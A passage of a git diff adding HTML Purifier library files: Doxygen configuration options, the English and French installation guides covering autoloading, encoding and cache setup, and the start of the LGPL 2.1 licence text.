+ +# Load stylesheet definitions from file. Syntax is similar to doxygen's +# config file, i.e. a series of assignments. You only have to provide +# replacements, missing definitions are set to their default value. + +RTF_STYLESHEET_FILE = + +# Set optional variables used in the generation of an rtf document. +# Syntax is similar to doxygen's config file. + +RTF_EXTENSIONS_FILE = + +#--------------------------------------------------------------------------- +# configuration options related to the man page output +#--------------------------------------------------------------------------- + +# If the GENERATE_MAN tag is set to YES (the default) Doxygen will +# generate man pages + +GENERATE_MAN = NO + +# The MAN_OUTPUT tag is used to specify where the man pages will be put. +# If a relative path is entered the value of OUTPUT_DIRECTORY will be +# put in front of it. If left blank `man' will be used as the default path. + +MAN_OUTPUT = man + +# The MAN_EXTENSION tag determines the extension that is added to +# the generated man pages (default is the subroutine's section .3) + +MAN_EXTENSION = .3 + +# If the MAN_LINKS tag is set to YES and Doxygen generates man output, +# then it will generate one additional man file for each entity +# documented in the real man page(s). These additional files +# only source the real man page, but without them the man command +# would be unable to find the correct page. The default is NO. + +MAN_LINKS = NO + +#--------------------------------------------------------------------------- +# configuration options related to the XML output +#--------------------------------------------------------------------------- + +# If the GENERATE_XML tag is set to YES Doxygen will +# generate an XML file that captures the structure of +# the code including all documentation. + +GENERATE_XML = NO + +# The XML_OUTPUT tag is used to specify where the XML pages will be put. +# If a relative path is entered the value of OUTPUT_DIRECTORY will be +# put in front of it. If left blank `xml' will be used as the default path. + +XML_OUTPUT = xml + +# The XML_SCHEMA tag can be used to specify an XML schema, +# which can be used by a validating XML parser to check the +# syntax of the XML files. + +XML_SCHEMA = + +# The XML_DTD tag can be used to specify an XML DTD, +# which can be used by a validating XML parser to check the +# syntax of the XML files. + +XML_DTD = + +# If the XML_PROGRAMLISTING tag is set to YES Doxygen will +# dump the program listings (including syntax highlighting +# and cross-referencing information) to the XML output. Note that +# enabling this will significantly increase the size of the XML output. + +XML_PROGRAMLISTING = YES + +#--------------------------------------------------------------------------- +# configuration options for the AutoGen Definitions output +#--------------------------------------------------------------------------- + +# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will +# generate an AutoGen Definitions (see autogen.sf.net) file +# that captures the structure of the code including all +# documentation. Note that this feature is still experimental +# and incomplete at the moment. + +GENERATE_AUTOGEN_DEF = NO + +#--------------------------------------------------------------------------- +# configuration options related to the Perl module output +#--------------------------------------------------------------------------- + +# If the GENERATE_PERLMOD tag is set to YES Doxygen will +# generate a Perl module file that captures the structure of +# the code including all documentation. Note that this +# feature is still experimental and incomplete at the +# moment. + +GENERATE_PERLMOD = NO + +# If the PERLMOD_LATEX tag is set to YES Doxygen will generate +# the necessary Makefile rules, Perl scripts and LaTeX code to be able +# to generate PDF and DVI output from the Perl module output. + +PERLMOD_LATEX = NO + +# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be +# nicely formatted so it can be parsed by a human reader. This is useful +# if you want to understand what is going on. On the other hand, if this +# tag is set to NO the size of the Perl module output will be much smaller +# and Perl will parse it just the same. + +PERLMOD_PRETTY = YES + +# The names of the make variables in the generated doxyrules.make file +# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX. +# This is useful so different doxyrules.make files included by the same +# Makefile don't overwrite each other's variables. + +PERLMOD_MAKEVAR_PREFIX = + +#--------------------------------------------------------------------------- +# Configuration options related to the preprocessor +#--------------------------------------------------------------------------- + +# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will +# evaluate all C-preprocessor directives found in the sources and include +# files. + +ENABLE_PREPROCESSING = YES + +# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro +# names in the source code. If set to NO (the default) only conditional +# compilation will be performed. Macro expansion can be done in a controlled +# way by setting EXPAND_ONLY_PREDEF to YES. + +MACRO_EXPANSION = NO + +# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES +# then the macro expansion is limited to the macros specified with the +# PREDEFINED and EXPAND_AS_DEFINED tags. + +EXPAND_ONLY_PREDEF = NO + +# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files +# in the INCLUDE_PATH (see below) will be search if a #include is found. + +SEARCH_INCLUDES = YES + +# The INCLUDE_PATH tag can be used to specify one or more directories that +# contain include files that are not input files but should be processed by +# the preprocessor. + +INCLUDE_PATH = + +# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard +# patterns (like *.h and *.hpp) to filter out the header-files in the +# directories. If left blank, the patterns specified with FILE_PATTERNS will +# be used. + +INCLUDE_FILE_PATTERNS = + +# The PREDEFINED tag can be used to specify one or more macro names that +# are defined before the preprocessor is started (similar to the -D option of +# gcc). The argument of the tag is a list of macros of the form: name +# or name=definition (no spaces). If the definition and the = are +# omitted =1 is assumed. To prevent a macro definition from being +# undefined via #undef or recursively expanded use the := operator +# instead of the = operator. + +PREDEFINED = + +# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then +# this tag can be used to specify a list of macro names that should be expanded. +# The macro definition that is found in the sources will be used. +# Use the PREDEFINED tag if you want to use a different macro definition. + +EXPAND_AS_DEFINED = + +# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then +# doxygen's preprocessor will remove all function-like macros that are alone +# on a line, have an all uppercase name, and do not end with a semicolon. Such +# function macros are typically used for boiler-plate code, and will confuse +# the parser if not removed. + +SKIP_FUNCTION_MACROS = YES + +#--------------------------------------------------------------------------- +# Configuration::additions related to external references +#--------------------------------------------------------------------------- + +# The TAGFILES option can be used to specify one or more tagfiles. +# Optionally an initial location of the external documentation +# can be added for each tagfile. The format of a tag file without +# this location is as follows: +# TAGFILES = file1 file2 ... +# Adding location for the tag files is done as follows: +# TAGFILES = file1=loc1 "file2 = loc2" ... +# where "loc1" and "loc2" can be relative or absolute paths or +# URLs. If a location is present for each tag, the installdox tool +# does not have to be run to correct the links. +# Note that each tag file must have a unique name +# (where the name does NOT include the path) +# If a tag file is not located in the directory in which doxygen +# is run, you must also specify the path to the tagfile here. + +TAGFILES = + +# When a file name is specified after GENERATE_TAGFILE, doxygen will create +# a tag file that is based on the input files it reads. + +GENERATE_TAGFILE = + +# If the ALLEXTERNALS tag is set to YES all external classes will be listed +# in the class index. If set to NO only the inherited external classes +# will be listed. + +ALLEXTERNALS = NO + +# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed +# in the modules index. If set to NO, only the current project's groups will +# be listed. + +EXTERNAL_GROUPS = YES + +# The PERL_PATH should be the absolute path and name of the perl script +# interpreter (i.e. the result of `which perl'). + +PERL_PATH = /usr/bin/perl + +#--------------------------------------------------------------------------- +# Configuration options related to the dot tool +#--------------------------------------------------------------------------- + +# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will +# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base +# or super classes. Setting the tag to NO turns the diagrams off. Note that +# this option is superseded by the HAVE_DOT option below. This is only a +# fallback. It is recommended to install and use dot, since it yields more +# powerful graphs. + +CLASS_DIAGRAMS = YES + +# You can define message sequence charts within doxygen comments using the \msc +# command. Doxygen will then run the mscgen tool (see http://www.mcternan.me.uk/mscgen/) to +# produce the chart and insert it in the documentation. The MSCGEN_PATH tag allows you to +# specify the directory where the mscgen tool resides. If left empty the tool is assumed to +# be found in the default search path. + +MSCGEN_PATH = + +# If set to YES, the inheritance and collaboration graphs will hide +# inheritance and usage relations if the target is undocumented +# or is not a class. + +HIDE_UNDOC_RELATIONS = YES + +# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is +# available from the path. This tool is part of Graphviz, a graph visualization +# toolkit from AT&T and Lucent Bell Labs. The other options in this section +# have no effect if this option is set to NO (the default) + +HAVE_DOT = NO + +# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen +# will generate a graph for each documented class showing the direct and +# indirect inheritance relations. Setting this tag to YES will force the +# the CLASS_DIAGRAMS tag to NO. + +CLASS_GRAPH = YES + +# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen +# will generate a graph for each documented class showing the direct and +# indirect implementation dependencies (inheritance, containment, and +# class references variables) of the class with other documented classes. + +COLLABORATION_GRAPH = YES + +# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen +# will generate a graph for groups, showing the direct groups dependencies + +GROUP_GRAPHS = YES + +# If the UML_LOOK tag is set to YES doxygen will generate inheritance and +# collaboration diagrams in a style similar to the OMG's Unified Modeling +# Language. + +UML_LOOK = NO + +# If set to YES, the inheritance and collaboration graphs will show the +# relations between templates and their instances. + +TEMPLATE_RELATIONS = NO + +# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT +# tags are set to YES then doxygen will generate a graph for each documented +# file showing the direct and indirect include dependencies of the file with +# other documented files. + +INCLUDE_GRAPH = YES + +# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and +# HAVE_DOT tags are set to YES then doxygen will generate a graph for each +# documented header file showing the documented files that directly or +# indirectly include this file. + +INCLUDED_BY_GRAPH = YES + +# If the CALL_GRAPH, SOURCE_BROWSER and HAVE_DOT tags are set to YES then doxygen will +# generate a call dependency graph for every global function or class method. +# Note that enabling this option will significantly increase the time of a run. +# So in most cases it will be better to enable call graphs for selected +# functions only using the \callgraph command. + +CALL_GRAPH = NO + +# If the CALLER_GRAPH, SOURCE_BROWSER and HAVE_DOT tags are set to YES then doxygen will +# generate a caller dependency graph for every global function or class method. +# Note that enabling this option will significantly increase the time of a run. +# So in most cases it will be better to enable caller graphs for selected +# functions only using the \callergraph command. + +CALLER_GRAPH = NO + +# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen +# will graphical hierarchy of all classes instead of a textual one. + +GRAPHICAL_HIERARCHY = YES + +# If the DIRECTORY_GRAPH, SHOW_DIRECTORIES and HAVE_DOT tags are set to YES +# then doxygen will show the dependencies a directory has on other directories +# in a graphical way. The dependency relations are determined by the #include +# relations between the files in the directories. + +DIRECTORY_GRAPH = YES + +# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images +# generated by dot. Possible values are png, jpg, or gif +# If left blank png will be used. + +DOT_IMAGE_FORMAT = png + +# The tag DOT_PATH can be used to specify the path where the dot tool can be +# found. If left blank, it is assumed the dot tool can be found in the path. + +DOT_PATH = + +# The DOTFILE_DIRS tag can be used to specify one or more directories that +# contain dot files that are included in the documentation (see the +# \dotfile command). + +DOTFILE_DIRS = + +# The MAX_DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of +# nodes that will be shown in the graph. If the number of nodes in a graph +# becomes larger than this value, doxygen will truncate the graph, which is +# visualized by representing a node as a red box. Note that doxygen if the number +# of direct children of the root node in a graph is already larger than +# MAX_DOT_GRAPH_NOTES then the graph will not be shown at all. Also note +# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH. + +DOT_GRAPH_MAX_NODES = 50 + +# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the +# graphs generated by dot. A depth value of 3 means that only nodes reachable +# from the root by following a path via at most 3 edges will be shown. Nodes +# that lay further from the root node will be omitted. Note that setting this +# option to 1 or 2 may greatly reduce the computation time needed for large +# code bases. Also note that the size of a graph can be further restricted by +# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction. + +MAX_DOT_GRAPH_DEPTH = 1000 + +# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent +# background. This is disabled by default, which results in a white background. +# Warning: Depending on the platform used, enabling this option may lead to +# badly anti-aliased labels on the edges of a graph (i.e. they become hard to +# read). + +DOT_TRANSPARENT = NO + +# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output +# files in one run (i.e. multiple -o and -T options on the command line). This +# makes dot run faster, but since only newer versions of dot (>1.8.10) +# support this, this feature is disabled by default. + +DOT_MULTI_TARGETS = NO + +# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will +# generate a legend page explaining the meaning of the various boxes and +# arrows in the dot generated graphs. + +GENERATE_LEGEND = YES + +# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will +# remove the intermediate dot files that are used to generate +# the various graphs. + +DOT_CLEANUP = YES + +#--------------------------------------------------------------------------- +# Configuration::additions related to the search engine +#--------------------------------------------------------------------------- + +# The SEARCHENGINE tag specifies whether or not a search engine should be +# used. If set to NO the values of all tags below this one will be ignored. + +SEARCHENGINE = NO + +# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/FOCUS b/lib/htmlpurifier/FOCUS new file mode 100644 index 000000000..bea619bac --- /dev/null +++ b/lib/htmlpurifier/FOCUS @@ -0,0 +1,13 @@ +8 - Minor security fixes + +[ Appendix A: Release focus IDs ] +0 - N/A +1 - Initial freshmeat announcement +2 - Documentation +3 - Code cleanup +4 - Minor feature enhancements +5 - Major feature enhancements +6 - Minor bugfixes +7 - Major bugfixes +8 - Minor security fixes +9 - Major security fixes diff --git a/lib/htmlpurifier/INSTALL b/lib/htmlpurifier/INSTALL new file mode 100644 index 000000000..677c04aa0 --- /dev/null +++ b/lib/htmlpurifier/INSTALL @@ -0,0 +1,374 @@ + +Install + How to install HTML Purifier + +HTML Purifier is designed to run out of the box, so actually using the +library is extremely easy. (Although... if you were looking for a +step-by-step installation GUI, you've downloaded the wrong software!) + +While the impatient can get going immediately with some of the sample +code at the bottom of this library, it's well worth reading this entire +document--most of the other documentation assumes that you are familiar +with these contents. + + +--------------------------------------------------------------------------- +1. Compatibility + +HTML Purifier is PHP 5 only, and is actively tested from PHP 5.0.5 and +up. It has no core dependencies with other libraries. PHP +4 support was deprecated on December 31, 2007 with HTML Purifier 3.0.0. +HTML Purifier is not compatible with zend.ze1_compatibility_mode. + +These optional extensions can enhance the capabilities of HTML Purifier: + + * iconv : Converts text to and from non-UTF-8 encodings + * bcmath : Used for unit conversion and imagecrash protection + * tidy : Used for pretty-printing HTML + +These optional libraries can enhance the capabilities of HTML Purifier: + + * CSSTidy : Clean CSS stylesheets using %Core.ExtractStyleBlocks + * Net_IDNA2 (PEAR) : IRI support using %Core.EnableIDNA + +--------------------------------------------------------------------------- +2. Reconnaissance + +A big plus of HTML Purifier is its inerrant support of standards, so +your web-pages should be standards-compliant. (They should also use +semantic markup, but that's another issue altogether, one HTML Purifier +cannot fix without reading your mind.) + +HTML Purifier can process these doctypes: + +* XHTML 1.0 Transitional (default) +* XHTML 1.0 Strict +* HTML 4.01 Transitional +* HTML 4.01 Strict +* XHTML 1.1 + +...and these character encodings: + +* UTF-8 (default) +* Any encoding iconv supports (with crippled internationalization support) + +These defaults reflect what my choices would be if I were authoring an +HTML document, however, what you choose depends on the nature of your +codebase. If you don't know what doctype you are using, you can determine +the doctype from this identifier at the top of your source code: + + <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + +...and the character encoding from this code: + + <meta http-equiv="Content-type" content="text/html;charset=ENCODING"> + +If the character encoding declaration is missing, STOP NOW, and +read 'docs/enduser-utf8.html' (web accessible at +http://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is +present, read this document anyway, as many websites specify their +document's character encoding incorrectly. + + +--------------------------------------------------------------------------- +3. Including the library + +The procedure is quite simple: + + require_once '/path/to/library/HTMLPurifier.auto.php'; + +This will setup an autoloader, so the library's files are only included +when you use them. + +Only the contents in the library/ folder are necessary, so you can remove +everything else when using HTML Purifier in a production environment. + +If you installed HTML Purifier via PEAR, all you need to do is: + + require_once 'HTMLPurifier.auto.php'; + +Please note that the usual PEAR practice of including just the classes you +want will not work with HTML Purifier's autoloading scheme. + +Advanced users, read on; other users can skip to section 4. + +Autoload compatibility +---------------------- + + HTML Purifier attempts to be as smart as possible when registering an + autoloader, but there are some cases where you will need to change + your own code to accomodate HTML Purifier. These are those cases: + + PHP VERSION IS LESS THAN 5.1.2, AND YOU'VE DEFINED __autoload + Because spl_autoload_register() doesn't exist in early versions + of PHP 5, HTML Purifier has no way of adding itself to the autoload + stack. Modify your __autoload function to test + HTMLPurifier_Bootstrap::autoload($class) + + For example, suppose your autoload function looks like this: + + function __autoload($class) { + require str_replace('_', '/', $class) . '.php'; + return true; + } + + A modified version with HTML Purifier would look like this: + + function __autoload($class) { + if (HTMLPurifier_Bootstrap::autoload($class)) return true; + require str_replace('_', '/', $class) . '.php'; + return true; + } + + Note that there *is* some custom behavior in our autoloader; the + original autoloader in our example would work for 99% of the time, + but would fail when including language files. + + AN __autoload FUNCTION IS DECLARED AFTER OUR AUTOLOADER IS REGISTERED + spl_autoload_register() has the curious behavior of disabling + the existing __autoload() handler. Users need to explicitly + spl_autoload_register('__autoload'). Because we use SPL when it + is available, __autoload() will ALWAYS be disabled. If __autoload() + is declared before HTML Purifier is loaded, this is not a problem: + HTML Purifier will register the function for you. But if it is + declared afterwards, it will mysteriously not work. This + snippet of code (after your autoloader is defined) will fix it: + + spl_autoload_register('__autoload') + + Users should also be on guard if they use a version of PHP previous + to 5.1.2 without an autoloader--HTML Purifier will define __autoload() + for you, which can collide with an autoloader that was added by *you* + later. + + +For better performance +---------------------- + + Opcode caches, which greatly speed up PHP initialization for scripts + with large amounts of code (HTML Purifier included), don't like + autoloaders. We offer an include file that includes all of HTML Purifier's + files in one go in an opcode cache friendly manner: + + // If /path/to/library isn't already in your include path, uncomment + // the below line: + // require '/path/to/library/HTMLPurifier.path.php'; + + require 'HTMLPurifier.includes.php'; + + Optional components still need to be included--you'll know if you try to + use a feature and you get a class doesn't exists error! The autoloader + can be used in conjunction with this approach to catch classes that are + missing. Simply add this afterwards: + + require 'HTMLPurifier.autoload.php'; + +Standalone version +------------------ + + HTML Purifier has a standalone distribution; you can also generate + a standalone file from the full version by running the script + maintenance/generate-standalone.php . The standalone version has the + benefit of having most of its code in one file, so parsing is much + faster and the library is easier to manage. + + If HTMLPurifier.standalone.php exists in the library directory, you + can use it like this: + + require '/path/to/HTMLPurifier.standalone.php'; + + This is equivalent to including HTMLPurifier.includes.php, except that + the contents of standalone/ will be added to your path. To override this + behavior, specify a new HTMLPURIFIER_PREFIX where standalone files can + be found (usually, this will be one directory up, the "true" library + directory in full distributions). Don't forget to set your path too! + + The autoloader can be added to the end to ensure the classes are + loaded when necessary; otherwise you can manually include them. + To use the autoloader, use this: + + require 'HTMLPurifier.autoload.php'; + +For advanced users +------------------ + + HTMLPurifier.auto.php performs a number of operations that can be done + individually. These are: + + HTMLPurifier.path.php + Puts /path/to/library in the include path. For high performance, + this should be done in php.ini. + + HTMLPurifier.autoload.php + Registers our autoload handler HTMLPurifier_Bootstrap::autoload($class). + + You can do these operations by yourself--in fact, you must modify your own + autoload handler if you are using a version of PHP earlier than PHP 5.1.2 + (See "Autoload compatibility" above). + + +--------------------------------------------------------------------------- +4. Configuration + +HTML Purifier is designed to run out-of-the-box, but occasionally HTML +Purifier needs to be told what to do. If you answer no to any of these +questions, read on; otherwise, you can skip to the next section (or, if you're +into configuring things just for the heck of it, skip to 4.3). + +* Am I using UTF-8? +* Am I using XHTML 1.0 Transitional? + +If you answered no to any of these questions, instantiate a configuration +object and read on: + + $config = HTMLPurifier_Config::createDefault(); + + +4.1. Setting a different character encoding + +You really shouldn't use any other encoding except UTF-8, especially if you +plan to support multilingual websites (read section three for more details). +However, switching to UTF-8 is not always immediately feasible, so we can +adapt. + +HTML Purifier uses iconv to support other character encodings, as such, +any encoding that iconv supports <http://www.gnu.org/software/libiconv/> +HTML Purifier supports with this code: + + $config->set('Core.Encoding', /* put your encoding here */); + +An example usage for Latin-1 websites (the most common encoding for English +websites): + + $config->set('Core.Encoding', 'ISO-8859-1'); + +Note that HTML Purifier's support for non-Unicode encodings is crippled by the +fact that any character not supported by that encoding will be silently +dropped, EVEN if it is ampersand escaped. If you want to work around +this, you are welcome to read docs/enduser-utf8.html for a fix, +but please be cognizant of the issues the "solution" creates (for this +reason, I do not include the solution in this document). + + +4.2. Setting a different doctype + +For those of you using HTML 4.01 Transitional, you can disable +XHTML output like this: + + $config->set('HTML.Doctype', 'HTML 4.01 Transitional'); + +Other supported doctypes include: + + * HTML 4.01 Strict + * HTML 4.01 Transitional + * XHTML 1.0 Strict + * XHTML 1.0 Transitional + * XHTML 1.1 + + +4.3. Other settings + +There are more configuration directives which can be read about +here: <http://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring, +but they can help out for those of you who like to exert maximum control over +your code. Some of the more interesting ones are configurable at the +demo <http://htmlpurifier.org/demo.php> and are well worth looking into +for your own system. + +For example, you can fine tune allowed elements and attributes, convert +relative URLs to absolute ones, and even autoparagraph input text! These +are, respectively, %HTML.Allowed, %URI.MakeAbsolute and %URI.Base, and +%AutoFormat.AutoParagraph. The %Namespace.Directive naming convention +translates to: + + $config->set('Namespace.Directive', $value); + +E.g. + + $config->set('HTML.Allowed', 'p,b,a[href],i'); + $config->set('URI.Base', 'http://www.example.com'); + $config->set('URI.MakeAbsolute', true); + $config->set('AutoFormat.AutoParagraph', true); + + +--------------------------------------------------------------------------- +5. Caching + +HTML Purifier generates some cache files (generally one or two) to speed up +its execution. For maximum performance, make sure that +library/HTMLPurifier/DefinitionCache/Serializer is writeable by the webserver. + +If you are in the library/ folder of HTML Purifier, you can set the +appropriate permissions using: + + chmod -R 0755 HTMLPurifier/DefinitionCache/Serializer + +If the above command doesn't work, you may need to assign write permissions +to all. This may be necessary if your webserver runs as nobody, but is +not recommended since it means any other user can write files in the +directory. Use: + + chmod -R 0777 HTMLPurifier/DefinitionCache/Serializer + +You can also chmod files via your FTP client; this option +is usually accessible by right clicking the corresponding directory and +then selecting "chmod" or "file permissions". + +Starting with 2.0.1, HTML Purifier will generate friendly error messages +that will tell you exactly what you have to chmod the directory to, if in doubt, +follow its advice. + +If you are unable or unwilling to give write permissions to the cache +directory, you can either disable the cache (and suffer a performance +hit): + + $config->set('Core.DefinitionCache', null); + +Or move the cache directory somewhere else (no trailing slash): + + $config->set('Cache.SerializerPath', '/home/user/absolute/path'); + + +--------------------------------------------------------------------------- +6. Using the code + +The interface is mind-numbingly simple: + + $purifier = new HTMLPurifier($config); + $clean_html = $purifier->purify( $dirty_html ); + +That's it! For more examples, check out docs/examples/ (they aren't very +different though). Also, docs/enduser-slow.html gives advice on what to +do if HTML Purifier is slowing down your application. + + +--------------------------------------------------------------------------- +7. Quick install + +First, make sure library/HTMLPurifier/DefinitionCache/Serializer is +writable by the webserver (see Section 5: Caching above for details). +If your website is in UTF-8 and XHTML Transitional, use this code: + +<?php + require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php'; + + $config = HTMLPurifier_Config::createDefault(); + $purifier = new HTMLPurifier($config); + $clean_html = $purifier->purify($dirty_html); +?> + +If your website is in a different encoding or doctype, use this code: + +<?php + require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php'; + + $config = HTMLPurifier_Config::createDefault(); + $config->set('Core.Encoding', 'ISO-8859-1'); // replace with your encoding + $config->set('HTML.Doctype', 'HTML 4.01 Transitional'); // replace with your doctype + $purifier = new HTMLPurifier($config); + + $clean_html = $purifier->purify($dirty_html); +?> + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/INSTALL.fr.utf8 b/lib/htmlpurifier/INSTALL.fr.utf8 new file mode 100644 index 000000000..9c533853b --- /dev/null +++ b/lib/htmlpurifier/INSTALL.fr.utf8 @@ -0,0 +1,69 @@ + +Installation + Comment installer HTML Purifier + +Attention: Ce document a encode en UTF-8. Si les lettres avec les accents +est essoreuse, prenez un mieux editeur de texte. + +À L'Aide: Je ne suis pas un diseur natif de français. Si vous trouvez une +erreur dans ce document, racontez-moi! Merci. + + +L'installation de HTML Purifier est trés simple, parce qu'il ne doit pas +la configuration. Dans le pied de de document, les utilisateurs +impatient peuvent trouver le code, mais je recommande que vous lisez +ce document pour quelques choses. + + +1. Compatibilité + +HTML Purifier fonctionne dans PHP 5. PHP 5.0.5 est le dernier +version que je le testais. Il ne dépend de les autre librairies. + +Les extensions optionnel est iconv (en général déjà installer) et +tidy (répandu aussi). Si vous utilisez UTF-8 et ne voulez pas +l'indentation, vous pouvez utiliser HTML Purifier sans ces extensions. + + +2. Inclure la librarie + +Utilisez: + + require_once '/path/to/library/HTMLPurifier.auto.php'; + +...quand vous devez utiliser HTML Purifier (ne inclure pas quand vous +ne devez pas, parce que HTML Purifier est trés grand.) + +HTML Purifier utilise 'autoload'. Si vous avez définu la fonction +__autoload, vous doivez ajoute cet programme: + + spl_autoload_register('__autoload') + +Plus d'information est dans le document 'INSTALL'. + + +3. Installation vite + +Si votre site web est en UTF-8 et XHTML Transitional, utilisez: + +<?php + require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php'; + + $purificateur = new HTMLPurifier(); + $html_propre = $purificateur->purify($html_salle); +?> + +Sinon, utilisez: + +<?php + require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php'; + + $config = HTMLPurifier_Config::createDefault(); + $config->set('Core', 'Encoding', 'ISO-8859-1'); //remplacez avec votre encoding + $config->set('Core', 'XHTML', true); //remplacez avec false si HTML 4.01 + $purificateur = new HTMLPurifier($config); + + $html_propre = $purificateur->purify($html_salle); +?> + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/LICENSE b/lib/htmlpurifier/LICENSE new file mode 100644 index 000000000..8c88a20d4 --- /dev/null +++ b/lib/htmlpurifier/LICENSE @@ -0,0 +1,504 @@ + GNU LESSER GENERAL PUBLIC LICENSE + Version 2.1, February 1999 + + Copyright (C) 1991, 1999 Free Software Foundation, Inc. + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the Lesser GPL. It also counts + as the successor of the GNU Library Public License, version 2, hence + the version number 2.1.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Lesser General Public License, applies to some +specially designated software packages--typically libraries--of the +Free Software Foundation and other authors who decide to use it. You +can use it too, but we suggest you first think carefully about whether +this license or the ordinary General Public License is the better +strategy to use in any particular case, based on the explanations below. + + When we speak of free software, we are referring to freedom of use, +not price. Our General Public Licenses are designed to make sure that +you have the freedom to distribute copies of free software (and charge +for this service if you wish); that you receive source code or can get +it if you want it; that you can change the software and use pieces of +it in new free programs; and that you are informed that you can do +these things. + + To protect your rights, we need to make restrictions that forbid +distributors to deny you these rights or to ask you to surrender these +rights. These restrictions translate to certain responsibilities for +you if you distribute copies of the library or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link other code with the library, you must provide +complete object files to the recipients, so that they can relink them +with the library after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + We protect your rights with a two-step method: (1) we copyright the +library, and (2) we offer you this license, which gives you legal +permission to copy, distribute and/or modify the library. + + To protect each distributor, we want to make it very clear that +there is no warranty for the free library. Also, if the library is +modified by someone else and passed on, the recipients should know +that what they have is not the original version, so that the original +author's reputation will not be affected by problems that might be +introduced by others. + + Finally, software patents pose a constant threat to the existence of +any free program. We wish to make sure that a company cannot +effectively restrict the users of a free program by obtaining a +restrictive license from a patent holder. Therefore, we insist that +any patent license obtained for a version of the library must be +consistent with the full freedom of use specified in this license. + + Most GNU software, including some libraries, is covered by the +ordinary GNU General Public License. This license, the GNU Lesser +General Public License, applies to certain designated libraries, and +is quite different from the ordinary General Public License. We use +this license for certain libraries in order to permit linking those +libraries into non-free programs. + + When a program is linked with a library, whether statically or using +a shared library, the combination of the two is legally speaking a +combined work, a derivative of the original library. The ordinary +General Public License therefore permits such linking only if the +entire combination fits its criteria of freedom. The Lesser General +Public License permits more lax criteria for linking other code with +the library. + + We call this license the "Lesser" General Public License because it +does Less to protect the user's freedom than the ordinary General +Public License. It also provides other free software developers Less +of an advantage over competing non-free programs. These disadvantages +are the reason we use the ordinary General Public License for many +libraries. However, the Lesser license provides advantages in certain +special circumstances. + + For example, on rare occasions, there may be a special need to +encourage the widest possible use of a certain library, so that it becomes +a de-facto standard. To achieve this, non-free programs must be +allowed to use the library. A more frequent case is that a free +library does the same job as widely used non-free libraries. In this +case, there is little to gain by limiting the free library to free +software only, so we use the Lesser General Public License. + + In other cases, permission to use a particular library in non-free +programs enables a greater number of people to use a large body of +free software. For example, permission to use the GNU C Library in +non-free programs enables many more people to use the whole GNU +operating system, as well as its variant, the GNU/Linux operating +system. + + Although the Lesser General Public License is Less protective of the +users' freedom, it does ensure that the user of a program that is +linked with the Library has the freedom and the wherewithal to run +that program using a modified version of the Library. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, whereas the latter must +be combined with the library in order to run. + + GNU LESSER GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library or other +program which contains a notice placed by the copyright holder or +other authorized party saying it may be distributed under the terms of +this Lesser General Public License (also called "this License"). +Each licensee is addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing 